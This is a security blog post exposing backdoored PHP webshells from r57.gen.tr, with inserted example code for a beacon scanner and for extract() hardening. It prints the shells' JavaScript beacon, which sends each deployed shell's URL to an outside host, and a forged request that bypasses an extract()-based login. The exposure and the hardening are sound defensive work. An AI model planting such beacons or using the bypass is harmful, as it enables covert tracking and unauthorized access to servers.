Hacking Script Kiddies, r57.gen.tr Shells Are Backdoored in a Way You Might Not Guess

TL;DR all shells from http://www.r57.gen.tr/ are backdoored, shockingly. But in a pretty clever way you probably didn’t expect.

You know sometimes when I find things in security that are probably unethical, I’m more impressed than morally distressed.

I decided to poke around some of the online sources for the typical shells (c99, r57, etc) and after a quick search:

[screenshot: Selection_001]

I’ve got all the shells I’d ever need!

Or do I? Let’s check out this first site shall we?

[screenshot: Selection_002]

[screenshot: Selection_003]

C99 is probably the more famous one, so let’s take a look at it!

Now immediately everyone’s first thought is to check the PHP itself for clever backdoors. After all, this is a backdoor shell so why wouldn’t it be a backdoored backdoor shell (bleh).

But notice this section:

Hmm, what’s the source for that page?

[screenshot: Selection_006]

Ho-ho-ho, that's a little suspicious: it's creating an image whose source is http://www.r57.gen.tr/yaz/yaz.php?a= followed by our current URL?

Naughty naughty, navigating to this URL we find:

[screenshot: Selection_005]

Oh a blank page, that’s probably nothing at all!

Or…just maybe…they are capturing the IP address (and, via that query string, the URL) of every deployed shell, either to alert the website owners or to steal the shells for themselves (far more likely).
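A defender's check for the phone-home trick described above, written as an added example (it is not code from the post or from the r57.gen.tr shells): it scans a PHP file for absolute URLs and flags those that have the page's own location concatenated onto them. The sample file content is constructed to mimic the pattern; the beacon host comes from the post, but the exact JavaScript shape and the helper name `find_callbacks` are assumptions.

```php
<?php
// Added example, not from the post. Scans PHP source for remote URLs and
// flags the ones that leak the current page location (a beacon).

// Constructed sample mimicking the backdoor: an image whose src is a remote
// URL with document.location appended. The host is the one named in the post.
$sample = <<<'PHP'
<?php
$login = "admin";
?>
<html><body>
<script>
var i = new Image();
i.src = "http://www.r57.gen.tr/yaz/yaz.php?a=" + document.location;
</script>
<img src="/static/logo.png">
<a href="http://example.com/docs">docs</a>
</body></html>
PHP;

/**
 * Return one finding per absolute URL in the source: line number, host, the
 * URL itself, and whether the page's own location is concatenated onto it
 * (the telltale of a phone-home beacon rather than an ordinary link).
 */
function find_callbacks(string $source): array
{
    $findings = [];
    foreach (explode("\n", $source) as $n => $line) {
        // Absolute URLs inside quotes (src="...", href="...", JS strings).
        if (!preg_match_all('~["\'](https?://[^"\']+)["\']~i', $line, $m)) {
            continue;
        }
        // Location leakage: the string is joined with the browser location
        // (client side) or with request details from $_SERVER (server side).
        $leaks = (bool) preg_match(
            '~\+\s*(document\.location|location\.href|window\.location)'
            . '|\$_SERVER\[[\'"](REQUEST_URI|HTTP_HOST|SCRIPT_NAME)[\'"]\]~',
            $line
        );
        foreach ($m[1] as $url) {
            $findings[] = [
                'line'           => $n + 1,
                'host'           => parse_url($url, PHP_URL_HOST) ?: '',
                'url'            => $url,
                'leaks_location' => $leaks,
            ];
        }
    }
    return $findings;
}

foreach (find_callbacks($sample) as $f) {
    $flag = $f['leaks_location'] ? 'BEACON' : 'remote';
    printf("line %d  %-7s %s (%s)\n", $f['line'], $flag, $f['url'], $f['host']);
}
```

Run it over a freshly downloaded shell before it ever touches a server; anything marked BEACON deserves a look at what is on the other end of that host, and any remote host at all in a "standalone" tool is worth an explanation.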

I’m willing to bet there is a PHP auth-bypass in the code as well…

Auth Bypass Exploit

Notice this piece of code here:
[screenshot: Selection_009]

I found this after diffing this c99 shell against other online copies. For those not familiar, extract() is a VERY dangerous function to use: you pass it an array and it creates a variable for each key, overwriting any variable of the same name that already exists.

This example from the official PHP site says it all:

Guess what is right after that line?

[screenshot: Selection_010]

So one could very easily overwrite $login, $md5_pass, etc. to bypass the login.
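The defect side by side with its fix, as an added example (not code from the post or from the c99 shell): a minimal login check in the style the post describes, where extract() on request data lets the caller replace the credentials the check compares against, next to a version that reads the two expected keys explicitly. The variable names $login and $md5_pass are the ones the post mentions; the function names and the constructed request are assumptions.

```php
<?php
// Added example, not from the post or the shell. Shows why extract() on
// request data breaks an authentication check, and the hardened form.

// --- Vulnerable pattern ---------------------------------------------------
// extract() turns every key of the array into a local variable. Anything set
// above it (here, the credentials) can be overwritten by a request parameter
// of the same name, because the default mode is EXTR_OVERWRITE.
function vulnerable_check(array $request): bool
{
    $login    = 'admin';
    $md5_pass = md5('s3cret');   // hard-coded credentials, as in the shell

    extract($request);           // BUG: request keys become variables

    // If the request carried 'login' and 'md5_pass', the check below now
    // compares the caller's values against the caller's own values.
    $user = $request['user'] ?? '';
    $pass = $request['pass'] ?? '';
    return $user === $login && md5($pass) === $md5_pass;
}

// --- Hardened pattern -----------------------------------------------------
// Never import request data into the variable table. Read exactly the keys
// you expect, and compare with constant-time functions.
function hardened_check(array $request): bool
{
    $login     = 'admin';
    // Normally loaded from storage; computed here so the example is self-contained.
    $pass_hash = password_hash('s3cret', PASSWORD_DEFAULT);

    $user = (string) ($request['user'] ?? '');
    $pass = (string) ($request['pass'] ?? '');

    return hash_equals($login, $user) && password_verify($pass, $pass_hash);
}

// Constructed request: wrong credentials, plus the two extra keys that the
// extract() defect turns into the comparison targets.
$forged = [
    'user'     => 'x',
    'pass'     => 'y',
    'login'    => 'x',
    'md5_pass' => md5('y'),
];

var_dump(vulnerable_check($forged)); // bool(true)  -- login bypassed
var_dump(hardened_check($forged));   // bool(false) -- extra keys ignored
```

The fix is not to pass EXTR_SKIP to extract() (that still pollutes scope with whatever the request names) but to stop importing request arrays into variables at all; grepping a codebase for `extract($_` is a quick way to find the same defect elsewhere.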

EDIT: This same JS link is in all of the shells on the site. See r57.php:

The moral of this lesson is obvious, but I'm more entertained by the fact that they went with a JS backdoor. Who would check the JavaScript for backdoors? It's the perfect crime!

The domain is apparently Turkish and has been registered for some time, so I can't imagine how many backdoored shells have been distributed.

But let’s be honest, somebody has to have noticed this right…?
[screenshot: Selection_008]

Or maybe nobody actually falls for this…?
*facepalm*

Which isn't even the original source, but is copied from http://www.computersecuritystudent.com/SECURITY_TOOLS/MUTILLIDAE/MUTILLIDAE_2511/lesson11/

For archiving reasons I’ll keep the source here to show the *current* backdoor in case it’s changed: http://pastebin.com/LCDrr0e8

EDIT: I now have a moral dilemma because I’m sure people will abuse this exploit to break into more sites…Hmm…

9 comments

  1. Hey man, just have to say that I love your blog. Spent a whole hour reading your archives, great stuff, keep it up! Reminds me of why I got into this stuff in the first place.

  2. what? you really who would question checking the js for a backdoor? it is actually the most common way this is done. however it's pretty easy to check if you're using a compact php shell, can simply step through code, ctrl+f for , and look for any obfuscated sections of code within shell (should be obvious)
